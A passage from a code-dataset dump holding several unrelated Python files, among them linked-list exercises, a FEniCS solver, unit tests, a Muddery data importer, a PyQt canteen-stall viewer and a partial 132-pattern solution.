node_pos","sub_path":"utils/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"482265171","text":"def FandR(find, replace, filename, save):\r\n print(filename)\r\n print(\"-------------------------------\")\r\n\r\n infile = open(str(filename), 'r')\r\n contents = infile.read()\r\n print(contents)\r\n print(\"-------------------------------\")\r\n \r\n with open(str(filename), 'r') as infile:\r\n contents = infile.read()\r\n contents = contents.replace(str(find), str(replace))\r\n print(contents)\r\n print(\"\")\r\n \r\n if(save == True): \r\n raw = open(str(filename), 'w')\r\n raw.write(contents)\r\n raw.close()\r\n\r\n'''\r\nThis program will find and replace things in text files that a normal\r\nfind and replace function cannot, like adding in new lines.\r\nIt will then print the entire text file to the screen, where it can be copied\r\nand saved. The find and replace parameters are as follows:\r\n\r\ncontents = contents.replace('FIND','REPLACE')\r\n\r\nThe escape characters like \n are useable.\r\n\r\nThe file to read from is on the first line as follows:\r\n\r\nwith open(\"filename.txt\") as infile\r\n'''\r\n\r\nFandR(\"o\", \"0\", \"example.txt\", True)\r\nprint(\"\")\r\nFandR(\"O\", \"()\", \"example.txt\", True)\r\n","sub_path":"Text_Editing_Generation/findAndReplace.py","file_name":"findAndReplace.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"46445912","text":"from dolfin import *\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nr0 = 0.3\nr1 = 1\nu_inner = 0\nu_outer = 0.1\nN = 100\n\n\"\"\"\nu_theta = r0*omega0*(r1/r-r/r1)/(r1/r0-r0/r1) \\\n\t\t+ r1*omega1*(r/r0-r0/r)/(r1/r0-r0/r1)\n\"\"\"\n\n\n\nmesh = IntervalMesh(N,r0,r1)\nV = FunctionSpace(mesh, 'Lagrange', 1)\nu = TrialFunction(V)\nv = TestFunction(V)\n\ndef inner_bc(x, on_boundary):\n return near(x[0],r0) and on_boundary\n\ndef outer_bc(x, on_boundary):\n return near(x[0],r1) and on_boundary\n\nbc_inner = DirichletBC(V, u_inner, inner_bc)\nbc_outer = DirichletBC(V, u_outer, outer_bc)\n\nbcs = [bc_inner,bc_outer]\n\nr = Expression('x[0]')\n\na = - r*inner(nabla_grad(u),nabla_grad(v))*dx - (1/r)*inner(v,u)*dx\nL = Constant('0')*v*r*dx\nu_ = Function(V)\nsolve(a == L, u_, bcs)\n\nplot(u_,interactive=True)\n\n","sub_path":"Week4/CouetteRot1D.py","file_name":"CouetteRot1D.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"75692977","text":"import math\nimport os,sys\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\nimport utils\n\nutils.__Title__(\"2.1 연결리스트 중복없애기\")\nclass Node :\n def __init__(self, item):\n self.item = item\n self.prev = None\n self.next = None\n\nclass LinkedList :\n def __init__(self, list = []):\n self.top = None\n for item in list :\n node = Node(item)\n self.append(node)\n\n def append(self, item) :\n if self.top == None :\n self.top = item\n else :\n cur = self.top\n prev = None\n while cur != None :\n prev = cur\n cur = cur.next\n prev.next = item\n item.prev = prev\n\n def remove(self, node):\n if node.prev != None :\n node.prev.next = node.next\n if node.next != None :\n node.next.prev = node.prev\n\n def __repr__(self):\n list = []\n cur = self.top\n while cur != None :\n list.append(cur.item)\n cur = cur.next\n return str(list)\n\ndef removeDuplicate(list) :\n uniqItems = set()\n\n cur = list.top\n while cur != None :\n if cur.item in uniqItems :\n list.remove(cur)\n else :\n uniqItems.add(cur.item)\n cur = cur.next\n return list\n\nlist = [1,2,3,1,5,6,7,2,1]\nutils.__print__(list)\nlinkedList = LinkedList(list)\nutils.__print__(removeDuplicate(linkedList)) # O(N)\n\n\nutils.__Title__(\"2.2 단방향 연결리스트에서 뒤에서 N번째 원소\")\ndef getReverseAt(list, n) :\n pre = list.top\n cur = list.top\n\n # prefetch iterator\n count = 0\n while pre != None :\n pre = pre.next\n if count == n :\n break\n count = count + 1\n\n # next iterator\n while pre != None :\n cur = cur.next\n pre = pre.next\n\n if cur != None :\n return cur.item\n else :\n return None\n\nlist = [1,2,3,1,5,6,7,2,1]\nutils.__print__(list)\nlinkedList = LinkedList(list)\nutils.__print__(getReverseAt(linkedList, 2)) # O(N)\n\nutils.__Title__(\"2.3 단방향 연결리스트에서 주어진 노드 삭제 (head 알수 없음)\")\ndef getAt(list, n) :\n cur = list.top\n idx = 1\n while cur != None :\n if idx == n :\n return cur\n cur = 
cur.next\n idx = idx + 1\n return None\n\ndef removeNode(node) :\n next = node.next\n\n if next != None :\n # 다음 노드의 값을 복사한다.\n node.item = next.item\n # node.next를 다음 노드의 next를 가리킨다\n node.next = next.next\n\nlist = [1,2,3,1,5,6,7,2,1]\nutils.__print__(list)\nlinkedList = LinkedList(list)\ntarget = getAt(linkedList, 3)\nutils.__print__(target.item)\nremoveNode(target)\nutils.__print__(linkedList) # O(N)\n\nutils.__Title__(\"2.5 리스트가 하나의 숫자를 가리킨다고 가정할 때, 두 리스트의 합을 반환하는 리스트\")\n# 7->1->6, 5->9->2 617 + 295 => 912 => 2->1->9\ndef sumLists_v1(list1, list2) :\n sum = getNumber(list1) + getNumber(list2)\n return LinkedList(toList(sum))\n\ndef getNumber(list) : # O(3N)\n nums = []\n cur = list.top\n while cur != None :\n nums.append(str(cur.item))\n cur = cur.next\n nums.reverse()\n return int(\"\".join(nums))\n\ndef toList(num) :\n list = [c for c in str(num)]\n list.reverse()\n return list\n\nlist1 = LinkedList([7,1,6])\nlist2 = LinkedList([5,9,2])\nsumList = sumLists_v1(list1, list2) # O(8N)\nutils.__print__(sumList)\n\ndef sumLists_v2(list1, list2) :\n n1 = list1.top\n n2 = list2.top\n\n list = LinkedList()\n passNum = 0\n while n1 != None or n2 != None :\n sum = getNum(n1) + getNum(n2)\n num = (sum % 10)\n list.append(Node(num + passNum))\n passNum = int(sum / 10)\n n1 = n1.next\n n2 = n2.next\n return list\n\ndef getNum(node) :\n if node != None and node.item != None :\n return node.item\n else :\n return 0\n\nlist1 = LinkedList([7,1,6])\nlist2 = LinkedList([5,9,2])\nsumList2 = sumLists_v2(list1, list2)\nutils.__print__(sumList2)\n\nutils.__Title__(\"2.6 주어진 연결 리스트가 회문인지 확인하는 함수\")\n# 0->1->2->1->0 => 회문\ndef isPalindrome_v1(list) :\n items = []\n\n cur = list.top\n while cur != None :\n items.append(cur.item)\n cur = cur.next\n\n startIdx = 0\n endIdx = len(items) - 1\n while startIdx <= endIdx :\n if items[startIdx] != items[endIdx] :\n return False\n startIdx = startIdx + 1\n endIdx = endIdx - 1\n return True\n\n# Doubly linked list인 경우\ndef isPalindrome_v2(list) :\n length = 1\n last = list.top\n while last.next != None :\n length = length + 1\n last = last.next\n\n first = list.top\n count = math.ceil(length / 2)\n for i in range(0, count) :\n if first.item != last.item :\n return False\n first = first.next\n last = last.prev\n return True\n\n# fast runner, slow runner\ndef isPalindrome_v3(list) :\n fast = list.top\n slow = list.top\n\n items = []\n while fast != None and fast.next != None :\n items.append(slow.item)\n fast = fast.next.next\n slow = slow.next\n\n # 가운데 값 skip\n if fast != None :\n slow = slow.next\n\n idx = len(items) - 1\n while slow != None :\n if items[idx] != slow.item :\n return False\n idx = idx - 1\n slow = slow.next\n return True\n\nlist1 = LinkedList([1,2,4,6,4,2,1])\nlist2 = LinkedList([1,2,4,4,2,1])\nlist3 = LinkedList([1,2,3,4,2,1])\nutils.__print__(isPalindrome_v1(list1)) # O(N)\nutils.__print__(isPalindrome_v1(list2))\nutils.__print__(isPalindrome_v1(list3))\nutils.__print__(isPalindrome_v2(list1)) # O(N)\nutils.__print__(isPalindrome_v2(list2))\nutils.__print__(isPalindrome_v2(list3))\nutils.__print__(isPalindrome_v3(list1)) # O(N)\nutils.__print__(isPalindrome_v3(list2))\nutils.__print__(isPalindrome_v3(list3))\n\nutils.__Title__(\"2.7 값도 위치도 동일한 두 리스트의 교집합 : 마지막 노드가 같아야 함\")\n# 1->2->3, 2->3 교집합 (2->3)\n# 1->2->3, 2->3->1 교집합 없음\ndef iterator(list, func) :\n cur = list.top\n while cur != None :\n func(cur)\n cur = cur.next\n\ndef getItems(list) :\n items = []\n iterator(list, lambda i: items.append(i.item))\n return items\n\ndef findSameNode_v1(list1, 
list2) :\n items1 = getItems(list1)\n items2 = getItems(list2)\n\n idx1 = len(items1) - 1\n idx2 = len(items2) - 1\n while idx1 >= 0 and idx2 >= 0:\n if items1[idx1] != items2[idx2] :\n break\n idx1 = idx1 - 1\n idx2 = idx2 - 1\n return LinkedList(items1[idx1 + 1:])\n\ndef getListInfo(list) :\n last = None\n size = 0\n\n cur = list.top\n while cur != None :\n last = cur\n size = size + 1\n cur = cur.next\n\n return {\n \"last\" : last,\n \"size\" : size\n }\n\ndef findSameNode_v2(list1, list2) :\n first = getListInfo(list1)\n second = getListInfo(list2)\n\n if first[\"last\"].item != second[\"last\"].item :\n return LinkedList()\n else :\n f_cur = list1.top\n s_cur = list2.top\n # skip\n for i in range(0, first[\"size\"] - second[\"size\"]) :\n f_cur = f_cur.next\n\n for i in range(0, second[\"size\"] - first[\"size\"]) :\n s_cur = s_cur.next\n\n matched = None\n while f_cur != None and s_cur != None:\n if f_cur.item != s_cur.item :\n matched = None\n elif matched == None :\n matched = f_cur\n f_cur = f_cur.next\n s_cur = s_cur.next\n\n list1.top = matched\n return list1\n\nlist1 = LinkedList([1,2,3,4])\nlist2 = LinkedList([0,10,2,3,4])\nutils.__print__(list1)\nutils.__print__(list2)\nprint(\"findSameNode_v1\", findSameNode_v1(list1, list2))\nprint(\"findSameNode_v2\", findSameNode_v2(list1, list2))\n\nlist1 = LinkedList([1,2,3])\nlist2 = LinkedList([0,10,2,3,4])\nutils.__print__(list1)\nutils.__print__(list2)\nprint(\"findSameNode_v1\", findSameNode_v1(list1, list2))\nprint(\"findSameNode_v2\", findSameNode_v2(list1, list2))\n\nutils.__Title__(\"2.8 순환 연결리스트가 있을 때, 순환되는 첫째 노드를 반환하는 함수\")\n# A->B->C->D->E->C(앞의 C와 동일한 객체) => C\n","sub_path":"src/main/python/cci/linked-list.py","file_name":"linked-list.py","file_ext":"py","file_size_in_byte":8249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616404157","text":"#!/usr/bin/env python\n\nimport sys\n\nfrom voice import *\nfrom graphics import *\n\nFPS=24\n\ndef main():\n display = init_display()\n\n while True:\n pygame.time.Clock().tick(FPS)\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n is_pressed = pygame.key.get_pressed()\n if is_pressed[K_SPACE]:\n draw(display, 'rec')\n rec()\n draw(display, 'wait')\n play()\n elif event.type == pygame.locals.QUIT:\n pygame.quit()\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"257469872","text":"#!/usr/bin/env python3\n\n\"\"\" Module to test lab3.py \"\"\"\n\n__author__ = 'Susan Sim'\n__email__ = \"ses@drsusansim.org\"\n__copyright__ = \"2015 Susan Sim\"\n__license__ = \"MIT License\"\n\nfrom lab3 import days_in_month\n\nMONTHS_WITH_31 = [\"January\", \"March\", \"May\", \"July\", \"August\", \"October\", \"December\"]\nMONTHS_WITH_30 = [\"April\", \"June\", \"September\", \"November\"]\nMONTHS_WITH_28_or_29 = [\"February\"]\n\n\ndef test_months_with_31():\n \"\"\"\n Test months with 31 days\n \"\"\"\n for item in MONTHS_WITH_31:\n assert days_in_month(item) == 31\n\n# Write a test function for the months with 30 days\ndef test_months_with_30():\n \"\"\"\n Test months with 30 days\n \"\"\"\n for item in MONTHS_WITH_30:\n assert days_in_month(item) == 30\n\n# Write a test function for the months with 28 or 29 days\ndef test_months_with_28_or_29():\n \"\"\"\n Test months with 28 or 29 days\n \"\"\"\n for item in 
MONTHS_WITH_28_or_29:\n assert days_in_month(item) == \"28 or 29\"\n\n# Write a test function for months that are not capitalized properly\n# Hint: use the lower() string method\n\ndef test_lower_months_with_31():\n \"\"\"\n Test months with 31 days with lowercase entry\n \"\"\"\n for item in MONTHS_WITH_31:\n item.lower()\n assert days_in_month(item) == 31\n\n\n# Write a test function for unexpected input\n# Hint: use a try/except block to deal with the exception\n# Hint: use data types other than strings as input\n\"\"\"\ntry:\n some funtion call\nexcept SomeError:\n We get here because an exception was raised\n assert False\n\"\"\"\n\n\ndef test_wrong_strings():\n \"\"\"\n Test for incorrect strings\n \"\"\"\n\n wrong_strings = [\"this\", \"can't\", \"be\", \"right\", \"12345\"]\n for item in wrong_strings:\n try:\n days_in_month(item)\n except ValueError:\n assert True\n\n\ndef test_wrong_attribute():\n \"\"\"\n Test for wrong data types\n \"\"\"\n wrong_attributes = [1, 4.5, False, [\"january\", \"March\"]]\n for item in wrong_attributes:\n try:\n days_in_month(item) == False\n except AttributeError:\n assert True","sub_path":"test_lab3.py","file_name":"test_lab3.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"631560643","text":"\"\"\"\nThis module imports data from files to db.\n\"\"\"\n\nimport os, glob, tempfile, zipfile, shutil\nfrom django.conf import settings\nfrom muddery.launcher.upgrader.upgrade_handler import UPGRADE_HANDLER\nfrom muddery.launcher import configs\nfrom muddery.launcher.utils import copy_tree\nfrom muddery.worldeditor.services.data_importer import import_file\nfrom muddery.worldeditor.dao import model_mapper\n\n\ndef unzip_data_all(fp):\n \"\"\"\n Import all data files from a zip file.\n \"\"\"\n temp_path = tempfile.mkdtemp()\n\n try:\n archive = zipfile.ZipFile(fp, 'r')\n archive.extractall(temp_path)\n source_path = temp_path\n \n # if the zip file contains a root dir\n file_list = os.listdir(temp_path)\n if len(file_list) == 1:\n path = os.path.join(temp_path, file_list[0])\n if os.path.isdir(path):\n source_path = path\n\n # Upgrade game data.\n UPGRADE_HANDLER.upgrade_data(source_path, None, configs.MUDDERY_LIB)\n\n # import data from path\n import_data_path(source_path)\n\n # load system localized strings\n # system data file's path\n system_data_path = os.path.join(settings.MUDDERY_DIR, settings.WORLD_DATA_FOLDER)\n\n # localized string file's path\n system_localized_string_path = os.path.join(system_data_path,\n settings.LOCALIZED_STRINGS_FOLDER,\n settings.LANGUAGE_CODE)\n\n # load data\n import_table_path(system_localized_string_path, settings.LOCALIZED_STRINGS_MODEL)\n\n # load custom localized strings\n # custom data file's path\n custom_localized_string_path = os.path.join(source_path, settings.LOCALIZED_STRINGS_MODEL)\n\n file_names = glob.glob(custom_localized_string_path + \".*\")\n if file_names:\n print(\"Importing %s\" % file_names[0])\n try:\n import_file(file_names[0], table_name=settings.LOCALIZED_STRINGS_MODEL, clear=False)\n except Exception as e:\n print(\"Import error: %s\" % e)\n\n finally:\n shutil.rmtree(temp_path)\n\n\ndef unzip_resources_all(fp):\n \"\"\"\n Import all resource files from a zip file.\n \"\"\"\n media_dir = os.path.join(settings.MEDIA_ROOT, settings.IMAGE_PATH)\n if not os.path.exists(media_dir):\n os.makedirs(media_dir)\n\n temp_path = tempfile.mkdtemp()\n\n try:\n archive = zipfile.ZipFile(fp, 'r')\n 
archive.extractall(temp_path)\n source_path = temp_path\n \n # if the zip file contains a root dir\n file_list = os.listdir(temp_path)\n if len(file_list) == 1:\n path = os.path.join(temp_path, file_list[0])\n if os.path.isdir(path):\n source_path = path\n\n copy_tree(source_path, media_dir)\n\n finally:\n shutil.rmtree(temp_path)\n\n\ndef import_data_path(path, clear=True, except_errors=False):\n \"\"\"\n Import data from path.\n\n Args:\n path: (string) data path.\n clear: (boolean) clear old data.\n except_errors: (boolean) except error records and load other records.\n \"\"\"\n\n # import tables one by one\n models = model_mapper.get_all_models()\n for model in models:\n table_name = model.__name__\n file_names = glob.glob(os.path.join(path, table_name) + \".*\")\n\n if file_names:\n print(\"Importing %s\" % file_names[0])\n try:\n import_file(file_names[0], table_name=table_name, clear=clear, except_errors=except_errors)\n except Exception as e:\n print(\"Import error: %s\" % e)\n\n\ndef import_table_path(path, table_name, clear=True, except_errors=False):\n \"\"\"\n Import a table's data from a path.\n\n Args:\n path: (string) data path.\n table_name: (string) table's name.\n clear: (boolean) clear old data.\n except_errors: (boolean) except error records and load other records.\n \"\"\"\n # clear old data\n model = model_mapper.get_model(table_name)\n if not model:\n return\n\n if clear:\n model.objects.all().delete()\n\n if not os.path.isdir(path):\n return\n\n for file_name in os.listdir(path):\n file_name = os.path.join(path, file_name)\n if os.path.isdir(file_name):\n # if it is a folder\n continue\n\n print(\"Importing %s\" % file_name)\n try:\n import_file(file_name, table_name=table_name, clear=False, except_errors=except_errors)\n except Exception as e:\n print(\"Import error: %s\" % e)\n","sub_path":"muddery/worldeditor/services/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"527420061","text":"from datetime import datetime\r\nfrom PyQt5.QtCore import QTimer, QDateTime, Qt, QSize, QDate, QTime\r\nfrom PyQt5.QtWidgets import QWidget, QListWidgetItem, QMainWindow, QDialog, QDialogButtonBox,QApplication\r\nfrom PyQt5.QtGui import QFont\r\nfrom ui_main import Ui_Real_time_canteen_system\r\nfrom ui_set_time import Ui_SetTimeDialog\r\nfrom ui_store_info import Ui_store_info\r\nfrom ui_queue_cal import Ui_Queue_time_calculater\r\nimport csv\r\nimport sys\r\nimport time\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n\r\n def __init__(self, store_info):\r\n super().__init__()\r\n\r\n self.store_info = store_info\r\n self.ui = Ui_Real_time_canteen_system()\r\n self.ui.setupUi(self)\r\n self.ui.stores = self.read_in_stores_info()\r\n self.timer = QTimer(self)\r\n self.fix_ui()\r\n self.update_time()\r\n\r\n self.ui.view_current_stores.clicked.connect(self.back_to_current_time)\r\n self.ui.view_current_stores.clicked.connect(self.current_store_list)\r\n self.ui.choose_other_time.clicked.connect(self.user_defined_time)\r\n self.ui.choose_other_time.clicked.connect(self.time_chooser)\r\n self.ui.show_all_stores.clicked.connect(self.show_all_stores)\r\n self.ui.avaliable_store_names2.itemClicked.connect(self.show_store_info)\r\n\r\n\r\n def update_time(self):\r\n #self.timer = QTimer(self)\r\n self.timer.timeout.connect(lambda: self.set_current_time(datetime.now()))\r\n self.timer.start()\r\n\r\n def fix_ui(self):\r\n 
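# seed the clock with the current time and enlarge the store-list font\r\n 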
self.set_current_time(datetime.now())\r\n font = QFont()\r\n font.setPointSize(15)\r\n self.ui.avaliable_store_names2.setFont(font)\r\n\r\n def set_current_time(self, time_point):\r\n self.ui.time_info.setText(time_point.strftime('%F %T'))\r\n\r\n def back_to_current_time(self):\r\n self.fix_ui()\r\n self.ui.time_type.setText(\"Current time:\")\r\n self.update_time()\r\n self.ui.avaliable_store_names2.show()\r\n\r\n def user_defined_time(self):\r\n self.ui.time_type.setText('Time is set to:')\r\n self.ui.avaliable_store_names2.hide()\r\n #timer = QTimer(self)\r\n self.timer.stop()\r\n # self.ui.time_info.setText('0000-00-00 00:00')\r\n\r\n def time_chooser(self):\r\n SetTimeDialog = QDialog()\r\n ui_time_chooser = Ui_SetTimeDialog()\r\n ui_time_chooser.setupUi(SetTimeDialog)\r\n ui_time_chooser.dateEdit.setDate(QDate.currentDate())\r\n ui_time_chooser.hour_spinBox.setValue(QTime.currentTime().hour())\r\n ui_time_chooser.minite_spinBox.setValue(QTime.currentTime().minute())\r\n SetTimeDialog.exec_()\r\n\r\n if SetTimeDialog.result() == 0:\r\n return\r\n\r\n new_time = QDateTime(ui_time_chooser.dateEdit.date())\r\n new_time.setTime(QTime(ui_time_chooser.hour_spinBox.value(),\r\n ui_time_chooser.minite_spinBox.value()))\r\n self.timer.stop()\r\n self.set_current_time(new_time.toPyDateTime())\r\n\r\n self.stores_at_choosed_time(new_time.toPyDateTime())\r\n\r\n\r\n def show_store_info(self):\r\n item = self.ui.avaliable_store_names2.currentItem()\r\n #decide the selected stall according to the text on the current item\r\n item_info = item.text()\r\n index = item_info.find('Mon')\r\n stall_name = item_info[:index].rstrip()\r\n date_str = self.ui.time_info.text()[:self.ui.time_info.text().index(' ')]\r\n day = datetime.strptime(date_str, '%Y-%m-%d').date() # only datetime is imported, so avoid the bare date class\r\n weekday = day.strftime('%a')\r\n\r\n stall_info = QDialog(self)\r\n ui_stall_info = Ui_store_info() # Ui_store_info is the dialog class imported at the top\r\n ui_stall_info.setupUi(stall_info)\r\n ui_stall_info.menu_list.addItems(self.menu_list(stall_name,weekday))\r\n\r\n ui_stall_info.call_queue_time.clicked.connect(lambda: self.queue_time_calculater(stall_name))\r\n #stall_info.show()\r\n stall_info.exec_()\r\n\r\n def queue_time_calculater(self,store_name):\r\n\r\n queue_time_calculater = QDialog(self)\r\n ui_queue_time = Ui_Queue_time_calculater()\r\n ui_queue_time.setupUi(queue_time_calculater)\r\n\r\n\r\n ui_queue_time.calculate.clicked.connect(lambda: self.calculate(store_name, ui_queue_time))\r\n queue_time_calculater.exec_()\r\n\r\n def calculate(self,store_name, ui_queue_time):\r\n queue_key = {'Yong Tau Foo':2,\r\n 'Mini Wok':1.5,\r\n 'Mcdonalds':1}\r\n\r\n try:\r\n people_num = int(ui_queue_time.queue_number_entering.text())\r\n except ValueError:\r\n ui_queue_time.estimated_queue_time.setText(\"Please enter a valid number of people in the queue.\")\r\n else:\r\n time = round(people_num*queue_key[store_name])\r\n time_str = str(time)\r\n ui_queue_time.estimated_queue_time.setText(\"The estimated queuing time is: \"+time_str+\" minutes.\")\r\n if time > 30:\r\n ui_queue_time.estimated_queue_time.setText(\"The estimated queuing time is: \"+time_str+\" minutes.\\nConsider trying another store.\")\r\n\r\n\r\n\r\n\r\n # stores has the same format as self.ui.stores\r\n def store_list(self, stores):\r\n #store_list = self.ui.avaliable_store_names2\r\n self.ui.avaliable_store_names2.clear()\r\n self.ui.avaliable_store_names2.addItems(stores)\r\n for i in range(len(stores)):\r\n self.ui.avaliable_store_names2.item(i).setSizeHint(QSize(0,100))\r\n\r\n\r\n\r\n # store name and opening hours (string)\r\n def read_in_stores_info(self):\r\n 
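# each CSV row is assumed to hold (name, opening hours); names shorter than 16\r\n # characters are padded so the list aligns, e.g. (illustrative row only):\r\n # \"Mini Wok        Mon-Fri: 08:00 - 20:00; Sat: 08:00 - 14:00\"\r\n 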
open(\"allStoresAndTime.csv\", \"r\") as csv_file:\r\n csv_content = csv.reader(csv_file, delimiter=',')\r\n for i in csv_content:\r\n store_name = i[0]\r\n open_time = i[1]\r\n if not store_name.strip() or not open_time.strip():\r\n continue\r\n length = len(store_name)\r\n if length < 16:\r\n stores_list.append(store_name + ' '*(16-length) + open_time)\r\n else:\r\n stores_list.append(store_name + open_time)\r\n\r\n return stores_list\r\n\r\n def show_all_stores(self):\r\n stores = self.ui.stores\r\n self.store_list(stores)\r\n self.ui.avaliable_store_names2.show()\r\n\r\n def stores_at_choosed_time(self,choosed_time):\r\n list = []\r\n weekday = choosed_time.strftime('%a')\r\n time_setted = datetime.strptime(choosed_time.strftime('%H:%M'), '%H:%M')\r\n stores = self.read_in_stores_info()\r\n for i in stores:\r\n try:\r\n Mon_Fri = i[i.index(':')+2:i.index(';')-1]\r\n start_time_Mon_Fri = datetime.strptime(Mon_Fri[:Mon_Fri.index('-')-1], '%H:%M')\r\n end_time_Mon_Fri = datetime.strptime(Mon_Fri[Mon_Fri.index('-')+2:], '%H:%M')\r\n if i.find('Sun') != -1:\r\n sat = i[i.index('Sat')+6:i.index('Sun')-3]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n sun = i[i.index('Sun')+6:]\r\n start_time_sun = datetime.strptime(sun[:sun.index('-')-1], '%H:%M')\r\n end_time_sun = datetime.strptime(sun[sun.index('-')+2:], '%H:%M')\r\n else:\r\n sat = i[i.index('Sat')+6:]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n start_time_sun = None\r\n end_time_sun = None\r\n\r\n if self.compare_time_setted(weekday,time_setted,start_time_Mon_Fri,end_time_Mon_Fri,start_time_sat,end_time_sat,start_time_sun,end_time_sun):\r\n list.append(i)\r\n\r\n except ValueError: break\r\n\r\n\r\n self.store_list(list)\r\n self.ui.avaliable_store_names2.show()\r\n\r\n def current_store_list(self):\r\n list = []\r\n #根据时间选出当前店铺\r\n weekday = datetime.now().strftime('%a')\r\n current_time = datetime.strptime(datetime.now().strftime('%H:%M'),'%H:%M')\r\n stores = self.read_in_stores_info()\r\n for i in stores:\r\n try:\r\n Mon_Fri = i[i.index(':')+2:i.index(';')-1]\r\n start_time_Mon_Fri = datetime.strptime(Mon_Fri[:Mon_Fri.index('-')-1], '%H:%M')\r\n end_time_Mon_Fri = datetime.strptime(Mon_Fri[Mon_Fri.index('-')+2:], '%H:%M')\r\n if i.find('Sun') != -1:\r\n sat = i[i.index('Sat')+6:i.index('Sun')-3]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n sun = i[i.index('Sun')+6:]\r\n start_time_sun = datetime.strptime(sun[:sun.index('-')-1], '%H:%M')\r\n end_time_sun = datetime.strptime(sun[sun.index('-')+2:], '%H:%M')\r\n else:\r\n sat = i[i.index('Sat')+6:]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n start_time_sun = None\r\n end_time_sun = None\r\n\r\n if self.compare_time_setted(weekday,current_time,start_time_Mon_Fri,end_time_Mon_Fri,start_time_sat,end_time_sat,start_time_sun,end_time_sun):\r\n list.append(i)\r\n\r\n except ValueError: break\r\n\r\n self.store_list(list)\r\n self.ui.avaliable_store_names2.show()\r\n\r\n\r\n def compare_time_setted(self,weekday,time_setted,start_time_Mon_Fri,end_time_Mon_Fri,start_time_sat,end_time_sat,start_time_sun=None,end_time_sun=None):\r\n\r\n if weekday == 'Sun':\r\n try:\r\n if start_time_sun <= 
if weekday == 'Sun':\r\n try:\r\n return start_time_sun <= time_setted <= end_time_sun\r\n except TypeError:\r\n # the store lists no Sunday opening hours\r\n return False\r\n else:\r\n if weekday == 'Sat':\r\n if start_time_sat <= time_setted <= end_time_sat:\r\n return True\r\n else: return False\r\n else:\r\n if start_time_Mon_Fri <= time_setted <= end_time_Mon_Fri:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n \r\n #Author: Wang Binli\r\n def morning_or_afternoon(self):\r\n date_str = self.ui.time_info.text()[self.ui.time_info.text().index(' ')+1:]\r\n time = datetime.strptime(date_str, \"%H:%M:%S\")\r\n if time.hour < 10:\r\n return 'mor'\r\n else:\r\n return 'aft'\r\n\r\n #Author: Wang Binli\r\n def menu_list(self,stall_name,weekday):\r\n items = []\r\n time = self.morning_or_afternoon()\r\n file_name = stall_name+time+\".txt\"\r\n with open(file_name, \"r\") as menu1:\r\n menu1_list = menu1.readlines()\r\n n = len(menu1_list)\r\n for i in range(2, n):\r\n if weekday == menu1_list[i].split(',')[0]:\r\n m = len(menu1_list[i].split(','))\r\n for j in range(1,m):\r\n items.append(menu1_list[i].split(',')[j])\r\n break\r\n else:\r\n continue\r\n return items\r\n","sub_path":"main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"595688711","text":"\"\"\"\n You are given an integer array nums of n integers. A 132-pattern subsequence consists of three integers\n nums[i], nums[j] and nums[k] such that i < j < k and nums[i] < nums[k] < nums[j].\n Return true if nums contains a 132-pattern subsequence, otherwise return false.\n Follow-up: an O(n^2) solution is easy to come up with; can you design an O(n log n) or O(n) one?\n\n Example 1:\n Input: nums = [1,2,3,4]\n Output: false\n Explanation: the sequence contains no 132-pattern subsequence.\n\n Example 2:\n Input: nums = [3,1,4,2]\n Output: true\n Explanation: the sequence contains one 132-pattern subsequence: [1, 4, 2].\n\n Example 3:\n Input: nums = [-1,3,2,0]\n Output: true\n Explanation: the sequence contains three 132-pattern subsequences: [-1, 3, 2], [-1, 3, 0] and [-1, 2, 0].\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def find132pattern(self, nums: List[int]) -> bool:\n # delegate to the O(n) monotonic-stack variant below\n return self.monotonic_stack_hand(nums)\n\n @classmethod\n def direct_hand(cls, nums) -> bool:\n if not nums:\n return False\n\n min_num = nums[0]\n length = len(nums)\n\n for index in range(1, length):\n for tmp_index in range(length - 1, index, -1):\n if min_num < nums[tmp_index] < nums[index]:\n return True\n min_num = min(min_num, nums[index])\n return False\n\n @classmethod\n def monotonic_stack_hand(cls, nums) -> bool:\n \"\"\"\n Monotonic stack, O(n)\n \"\"\"\n if not nums:\n return False\n\n length = len(nums)\n\n # first compute, for each index, the minimum element to its left\n left_min_list = [float(\"inf\")] * length\n for i in range(1, length):\n left_min_list[i] = min(left_min_list[i - 1], nums[i - 1])\n\n stack = []\n\n for index in range(length - 1, -1, -1):\n tmp_num = float(\"-inf\")\n\n # use the monotonic stack to find, to the right of the current element,\n # the largest value that is still smaller than it\n # monotonically increasing: values shrink from the stack top to the bottom\n # monotonically decreasing: values grow from the stack top to the bottom\n # which one you have is decided by the pop order: if popped values grow it is 